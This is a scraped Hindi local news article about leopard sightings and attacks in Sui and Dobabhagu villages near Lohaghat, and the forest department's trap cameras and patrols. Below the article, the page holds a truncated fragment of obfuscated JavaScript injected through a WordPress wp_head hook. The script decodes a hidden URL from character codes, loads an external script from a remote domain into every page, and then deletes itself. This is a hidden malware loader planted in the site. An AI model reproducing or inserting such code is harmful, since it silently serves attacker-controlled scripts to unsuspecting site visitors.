Saturday, July 27, 2024
spot_img

सुंई के बाद अब डोबाभागू में भी तेंदुए की दहशत

लोहाघाट के सुंई गांव के बाद बाराकोट के डोबाभागू गांव में भी दिनदहाड़े तेंदुआ दिखने से लोग दहशत में हैं। सुंई क्षेत्र में लगे ट्रैप कमरों में भी तेंदुए की गतिविधि नहीं दिख रही है। लोगों ने वन विभाग से तेंदुए को जल्द से जल्द पकड़ने की मांग की है।

सुंई के गलचौड़ा क्षेत्र में एक सप्ताह से तेंदुआ दिखने से लोगों में दहशत है। तेंदुआ रात के समय दो लोगों पर हमला भी कर चुका है। लोगों की शिकायत के बाद वन विभाग ने सुंई क्षेत्र में रात के समय नियमित गश्त और पटाखे फोड़ने का क्रम जारी रखा है। साथ ही तीन जगहों पर ट्रैप कैमरे भी लगाए हैं। इधर डोबाभागू के जगदीश तिवारी, शेखर तिवारी, हेमा देवी आदि ने बताया कि तेंदुए को दिनदहाड़े घर की छत पर देखा है जिससे गांव में दहशत है। इधर वन विभाग के रेंजर दीप जोशी ने बताया कि तेंदुए की हलचलों को कैंद करने के लिए तीन ट्रैप कैमरे लगाए गए हैं। समय-समय पर कैमरों की लोकेशन भी बदली जा रही है लेकिन अब तक सफलता नहीं मिली है। रेंजर जोशी ने बताया कि लोगों को जागरूक करने का सिलसिला जारी है। उन्होंने बताया कि कभी-कभी गलती से तेंदुए भटककर गांव की तरफ भी आ जाता है। फिलहाल रात्रि गश्त जारी है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>